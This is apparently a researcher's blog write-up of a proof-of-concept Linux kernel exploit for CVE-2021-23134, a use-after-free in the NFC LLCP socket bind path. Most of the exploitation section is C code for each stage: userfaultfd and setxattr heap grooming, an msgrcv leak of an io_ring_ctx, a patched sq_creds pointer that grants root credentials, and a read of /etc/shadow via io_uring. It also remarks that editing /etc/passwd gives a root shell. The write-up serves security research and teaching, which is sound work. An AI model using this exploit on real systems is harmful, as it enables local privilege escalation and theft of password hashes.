Linux kernel Use-After-Free (CVE-2021-23134) PoC.

Warning to the reader

This is my first time doing kernel exploit development - so the following probably contains some errors which I apologise in advance for.

The bug

The bug is a Use After Free (UAF) in the Near-Field-Communication (NFC) subsystem of the Linux kernel (before v5.12.4). However, for this demonstration we will exploit it on v5.15, with the patch reversed.

Let $S_i$ be a socket constructed with:

socket(AF_NFC, SOCK_STREAM, NFC_SOCKPROTO_LLCP)

Then suppose we bind $S_i$ to an address $A$. $S_i$ will be loaded with a pointer to an object $L$ of type: nfc_llcp_local. However, if the bind fails for $S_i$ then $L$ will be freed while $S_i \to L$ remains defined. So a future computation which dereferences $S_i \to L$ will transition the kernel into a weird state.

static int llcp_sock_bind(struct socket *sock, struct sockaddr *addr, int alen)
{
[...]
	llcp_sock->local = nfc_llcp_local_get(local);
	[...]
	if (!llcp_sock->service_name) {
		nfc_llcp_local_put(llcp_sock->local);
		ret = -ENOMEM;
		goto put_dev;
	}
	llcp_sock->ssap = nfc_llcp_get_sdp_ssap(local, llcp_sock);
	if (llcp_sock->ssap == LLCP_SAP_MAX) {
		nfc_llcp_local_put(llcp_sock->local);
		kfree(llcp_sock->service_name);
		llcp_sock->service_name = NULL;
		ret = -EADDRINUSE;
		goto put_dev;
	}

The patch removes the pointer $S_i \to L$ when $L$ is freed on bind failure. Further information on the bug

nfc_llcp_local_put(llcp_sock->local);
llcp_sock->local = NULL;

Terms

io_uring

Input/Output (I/O) can be performed synchronously or asynchronously. With the former, when we request an I/O operation we wait for its completion before continuing other work. With the latter, we may perform other tasks in the meantime. Let’s say that asynchronous I/O is a superset of synchronous I/O.

The io_uring mechanism implements asynchronous I/O. Upon setting up an io_uring instance we get two related ring buffers: one for submissions and one for completions. Each submission is a request to the kernel to carry out an I/O operation. The completions are objects which return the status and data from an I/O request. We retrieve an object from the submission queue entries array, initialise it with an opcode and related data, and then issue the system call io_uring_enter to submit.

We can also setup the io_uring instance with the flag IORING_SETUP_SQPOLL which enables an internal kernel thread to poll the submission queue for new submissions. This reduces system call overhead by ensuring there is always a kernel thread waiting to carry out requests. We will take advantage of this as this kernel thread loads its credentials from an object in the kernel heap. LWN article

userfaultfd

A system call which enables a user to create a file descriptor for implementing on-demand paging in userspace. We use this system call extensively to manage the kernel heap by handling protection faults generated while in copy_from_user and copy_to_user. manpage

msgsnd and msgrcv

System calls which enable interprocess communication along message queues. They are message send and message receive, respectively. manpage

page fault

Usually, the memory management unit issues a page fault when a thread attempts to access a virtual memory address which is not yet associated with a physical frame. In this case, the kernel may resolve the fault by creating a new page table entry for the specified page. However, in this more general context we refer also to general protection faults induced by attempts to access memory which is protected in certain ways i.e. writing to read-only memory. This is because userfaultfd can be configured to handle “missing page” faults as well as protection faults.

Exploitation

Assumptions

  • kernel v5.15 with the bug reintroduced. Note that io_ring_ctx is not immediately useable in v5.12 as it’s issued from kmalloc-4k. I was playing around on v5.15 here. But maybe we could achieve a more cache-agnostic primitive by: a) leaking or guessing the address of an io_ring_ctx object, b) forging it into a list which is later “destructed” by kfree performed on all its nodes, or overwriting a pointer in $L$ which is also passed to kfree.
  • sysctl knob vm.unprivileged_userfaultfd=1.
  • capability CAP_NET_RAW by default or through user namespaces.

Strategy overview

The strategy is to leak and overwrite an object $R$ of type io_ring_ctx. By doing this, we can control the sq_creds field of $R$. Note that $R$’s type is chosen because objects of $R$’s and $L$’s types are similarly issued from kmalloc-2k.

$R \to$ sq_creds replaces the current credentials of the submission queue poller (SQP) thread when it performs an io_uring request. If sq_creds points to a struct cred object $C$ such that $C$ has uid, gid, and so on set to $0$, then the SQP thread will perform I/O requests as if the invoking user were root.

We can therefore read or write files on disk as an unprivileged user by issuing requests to the io_uring instance (managed by our controlled $R$). The demonstration here just reads out /etc/shadow. But to attain root privileges, simply edit /etc/passwd to enter a root shell.

Components

We use the following components and techniques:

  1. three NFC sockets: $S_1$, $S_2$, and $S_3$.
  2. six threads: main, $X$, $Y$, $Z$, $T$, and $H$.
  3. msgsnd + msgrcv for leaking $R$.
  4. userfaultfd + setxattr for writing to $R$ and for ensuring that $R$ is not reallocated by another thread during and after exploitation.

Background and conventions

With three NFC sockets, we are able to free $L$ three times. However, after each free, we need to overwrite some portion of $L$, which we call the local header, to ensure that the subsequent free will not cause a crash. Specifically, we write to set the refcount to $1$ so that the next free will not set the refcount to $-1$, raising a warning or crashing the process. Additionally, we ensure the first list_head field of $L$ is well defined.

With threads $X$, $Y$, $Z$ we coordinate: allocating $L$ again, holding $L$ in memory, reading from $L$ and writing to $L$. After a certain point, $L$ is denoted by $R$ as we reallocate the same object which was once used for $S_i \to L$ as $R$. The aim is to show that $L \equiv R$ through our exploit logic.

The setxattr technique is well known. It allows the user to allocate a kvalue object whose size and contents the user determines. It allows us to write from the beginning of the kernel object. However, after we finish writing to kvalue from userspace, kvalue is freed.

The msgsnd + msgrcv technique is also known. As a recap: msgsnd allocates a msg_msg object which acts as a header followed by a message text whose length and contents the user determines. The msg_msg object fields should remain well defined if we want msgrcv to work correctly. Hence, we can’t write from the beginning of the kernel object. On the other hand, msgrcv copies out the message text to userspace and then frees the msg_msg object. The user determines the length of the message text as well as when the msg_msg is received and freed.

We use userfaultfd to pause a thread while in the kernel context via setxattr. This technique is documented here. We use two variants of the technique. One issues a page fault when reading at a userspace address. The other issues a page fault when writing at a userspace address. These correspond to copy_from_user and copy_to_user, respectively. The former is associated with setxattr and the latter with msgrcv.

Finally, a note on conventions. In the next section “unblocking thread $X$” usually means handling the page fault caused by thread $X$ while in the kernel context. A thread cannot handle its own page fault, but delegates this to a thread further up in the hierarchy. Though, not necessarily the next one up i.e. thread $Z$ unblocks thread main and thread $Y$ while thread $Y$ unblocks thread $X$.

If we are dealing with a setxattr page fault, then to “handle the page fault” means we provide a new buffer to the userfaultfd subsystem with an ioctl. This then allows the write to kvalue ($L$) to continue, afterwards freeing kvalue ($L$). Similarly, with the msgrcv page fault we unprotect the buffer and continue reading. The reader is advised to look over Vitaly Nikolenko’s explanation linked above. This will explain what we mean when we say “page fault at a certain offset” in the next section.

Method description

First, we close $S_1$, freeing $L$. We then allocate $7$ msgsnd buffers which discard additional allocations. Now that $L$ is free, we can reallocate it using setxattr. The value which we pass to setxattr is memory protected such that reading at a certain offset will result in a page fault. With userfaultfd we register the corresponding range so that thread $X$ can catch the page fault. The offset is the size of our own defined header for $L$’s type. We need to overwrite the header of $L$ so that freeing it again (when we close $S_2$) will not result in an early crash. This header just includes a list_head and a refcount field, whose counter value we set to $1$.

// free S1->L
close(sock1);

// remove the other allocations
do_msgsnd(7);

// mmap page, setup userfaultfd, init thread X
pthread_t thread_x;
pthread_mutex_lock(&lock_x[1]);
char* page_x = create_thread('x', 0, &thread_x, &X);

// overwrite the refcount for each page 
struct local* lc_x = setup_localhdr(page_x);

// set page perms
mprot_leaf(page_x, PROT_WRITE & ~(PROT_READ));

Second, from thread $X$, we catch the page fault issued in setxattr from the main thread. Now we do the same as in the main thread with the difference: we register a new range for a new value, we want the thread $Y$ to catch the next page fault, and the offset at which the page fault occurs is the size of struct msg_msg $+ 8$. We still overwrite $L$ with our header.

for (;;) {
	struct pollfd pollfd;
	pollfd.fd = pa->fd;
	pollfd.events = POLLIN;
	int n = poll(&pollfd, 1, -1);

	if (n) {
		int nread = read(pa->fd, &pa->msg, sizeof(struct uffd_msg));

		// free S2->L
		close(sock2);

		// setup y thread
		pthread_t thread_y;
		pthread_mutex_lock(&lock_y[1]);
		char* page_y = create_thread('y', 0, &thread_y, &Y);
		struct local* lc_y = (page_y + (PAGESIZE - sizeof(struct msg_msg) + 8));
		lc_y->list.next = lc_y;
		lc_y->list.prev = lc_y;
		lc_y->ref.refcount.refs.counter = 1;

		mprot_leaf(page_y, PROT_WRITE & ~(PROT_READ));

		// allocate A again
		setxattr("/home/guest/", "hiY", lc_y, BUFF_SIZE, XATTR_REPLACE);

Third, from thread $Y$, we catch the previous page fault issued in setxattr as performed by $X$. However, this time after we close $S_3$, freeing $L$ for the third time, we allocate $L$ again through msgsnd. We then create a write protected buffer and register it with userfaultfd, our userspace receiver msg_msg sits at a negative offset from the write protected buffer. We pass the address of our msg_msg object to msgrcv. When msgrcv, specifically store_msg, writes to an offset from msg_msg, another page fault will be issued. This offset is determined by the size of the struct msg_msg header.

for (;;) {
	struct pollfd pollfd;
	pollfd.fd = pa->fd;
	pollfd.events = POLLIN;
	int n = poll(&pollfd, 1, -1);

	if (n) {
		int nread = read(pa->fd, &pa->msg, sizeof(struct uffd_msg));

		// free S3->L
		close(sock3);

		// reallocate L
		char buf[BUFF_SIZE];
		struct msgbuf* msgb = buf;
		msgb->mtype = 5;
		int msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT);
		msgsnd(msqid, msgb, BUFF_SIZE, 0);

		// prepare the z thread
		pthread_t thread_z;
		pthread_mutex_lock(&lock_z[1]);
		char* page_z = create_thread('z', 0, &thread_z, &Z);
		Z.page = page_z;
		long* mhdr = setup_mhdr(page_z);

		struct uffdio_writeprotect uffd_wp = {
			.mode = UFFDIO_WRITEPROTECT_MODE_WP,
			.range = {
				.start = ((long)page_z) + PAGESIZE,
				.len = PAGESIZE
			}
		};
		ioctl(Z.fd, UFFDIO_WRITEPROTECT, &uffd_wp);

		// prepare to leak msgrcv and page fault at msg->mtext
		msgrcv(msqid, mhdr, BUFF_SIZE, 5, 0);

At this point, main is paused to hold $L$ in place. We later unblock main by handling the page fault issued from setxattr in main - this will free $L$ to be reallocated as $R$. Additionally, $Y$ is paused to hold $L$ in place. $Y$’s continuation would leak the data in $L$ (at that point, $R$) to userspace, and then $Y$ would continue thread $X$ by resolving the setxattr page fault issued from $X$. Finally, $X$ is paused and will continue writing to $L$ ($R$) when $Y$ resolves $X$’s page fault.

Fourth, from thread $Z$, we catch the page fault issued in msgrcv as performed by $Y$.
Now $X$ unblocks main by handling its page fault. This continues the setxattr write over $L$ and subsequently frees $L$ for the fourth time. We then allocate an io_ring_ctx object through the io_uring_setup system call and so $L \equiv R$. Finally, $Z$ attempts to acquire a lock which, if successful, would lead it to create a new thread $T$ allocating $R$ again with setxattr. However, at this point, thread $Y$ holds the lock and so $Z$ is paused attempting to acquire it.

for (;;) {
	struct pollfd pollfd;
	pollfd.fd = pa->fd;
	pollfd.events = POLLIN;
	int n = poll(&pollfd, 1, -1);

	if (n) {
		int nread = read(pa->fd, &pa->msg, sizeof(struct uffd_msg));

		if (pa->msg.arg.pagefault.flags & UFFD_PAGEFAULT_FLAG_WP) {

			// unblock main 
			char buf[BUFF_SIZE];
			struct uffdio_copy uffdio_copy_x;
			uffdio_copy_x.src = buf;
			uffdio_copy_x.dst = (unsigned long)X.msg.arg.pagefault.address;
			uffdio_copy_x.len = PAGESIZE;
			uffdio_copy_x.mode = 0;
			uffdio_copy_x.copy = 0;
			ioctl(X.fd, UFFDIO_COPY, &uffdio_copy_x);

			// alloc L as R
			io_uring_queue_init(8, &ring, IORING_SETUP_SQPOLL);

The three major phases of this exploit begin here.

Fifth, $Z$ unblocks thread $Y$ by handling the write protected page fault. This first copies out $R$ to userspace. But by doing this, it also frees $R$. So, we relinquish the above lock ensuring that $Z$ continues. When $Z$ continues, it uses setxattr with a value which when read results in a page fault at the first byte. Thread $T$ catches this page fault and doesn’t handle it. So, $R$ is not available to another thread for reallocation and potential corruption.

// continue the copy_to_user() in thread Y
struct uffdio_writeprotect uffd_wp = {
	.mode = 0,
	.range = {
		.start = ((long)Z.page + PAGESIZE),
		.len = PAGESIZE
	}
};
ioctl(Z.fd, UFFDIO_WRITEPROTECT, &uffd_wp);
pthread_mutex_lock(&lock_z[1]);

// hold R forever
pthread_t thread_t;
pthread_mutex_lock(&lock_t[1]);
char* page_t = create_thread('t', 0, &thread_t, &T);
mprot_leaf(page_t, PROT_WRITE & ~(PROT_READ));
setxattr("/home/guest/", "hiT", page_t + PAGESIZE, BUFF_SIZE, XATTR_REPLACE);

pthread_join(thread_t, NULL);

After we have $R$’s data, we locate the current $R \to$ sq_creds in our userspace buffer at offset $78$ (with scale factor sizeof(uint64)). After reading the leaked sq_creds, we subtract $176$ from it. The intention is to make $R \to$ sq_creds point “behind” the current struct cred object. We then write the new value back into our userspace buffer. Finally, we unblock thread $X$ by handling the page fault issued from setxattr. This writes our userspace buffer to $R$, maintaining all fields except sq_creds which we have manipulated. But by doing this, we also free $R$. So we use setxattr again and catch the page fault in $H$, in the same way as in $T$.

pthread_mutex_unlock(&lock_z[1]);

// patch sq_creds to elevate privileges
mhdr[78] -= CREDS_SZ;

// continue to write over R
struct uffdio_copy uffdio_copy;
uffdio_copy.src = mhdr;
uffdio_copy.dst = (unsigned long)pa->msg.arg.pagefault.address;
uffdio_copy.len = PAGESIZE;
uffdio_copy.mode = 0;
uffdio_copy.copy = 0;
ioctl(pa->fd, UFFDIO_COPY, &uffdio_copy);

// finally, hold R again so someone else
// doesn't corrupt R
pthread_t thread_h;
pthread_mutex_lock(&lock_h[0]);
pthread_mutex_lock(&lock_h[1]);
char* page_h = create_thread('h', 0, &thread_h, &H);
mprot_leaf(page_h, PROT_WRITE & ~(PROT_READ));
pthread_mutex_unlock(&lock_h[0]);
setxattr("/home/guest/", "hiH", page_h + PAGESIZE, BUFF_SIZE, XATTR_REPLACE);

Finally, from thread $T$ we obtain a file descriptor for the directory “/etc/” using open directly. Then we issue an openat request to the io_uring instance. After retrieving the completion queue entry, we have a file descriptor for “/etc/shadow”. We then issue a read request which copies the contents of “/etc/shadow” into a userspace buffer.

for (;;) {
	struct pollfd pollfd;
	pollfd.fd = pa->fd;
	pollfd.events = POLLIN;
	int n = poll(&pollfd, 1, -1);

	if (n) {
		int rfd = open("/etc/", O_RDONLY);
		char* fname = "shadow";

		struct io_uring_sqe* sqe;
		sqe = io_uring_get_sqe(&ring);

		char str[BUFF_SIZE];
		io_uring_prep_openat(sqe, rfd, fname, O_RDONLY, S_IRUSR);
		io_uring_submit(&ring);

		struct io_uring_cqe* cqe;
		io_uring_wait_cqe(&ring, &cqe);
		printf("got cqe %d\n", cqe->res);
		io_uring_cqe_seen(&ring, cqe);

		sqe = io_uring_get_sqe(&ring);
		io_uring_prep_read(sqe, cqe->res, str, BUFF_SIZE, 1);

		io_uring_submit(&ring);

		io_uring_wait_cqe(&ring, &cqe);
		printf("got cqe %d\n", cqe->res);

		printf("%s", str);

		io_uring_queue_exit(&ring);

		// sleep forever
		printf("beginning cleanup routine\n");
		pthread_mutex_lock(&lock_h[1]);
	}
}

With the end resulting being: image The full code is here

Written on February 20, 2022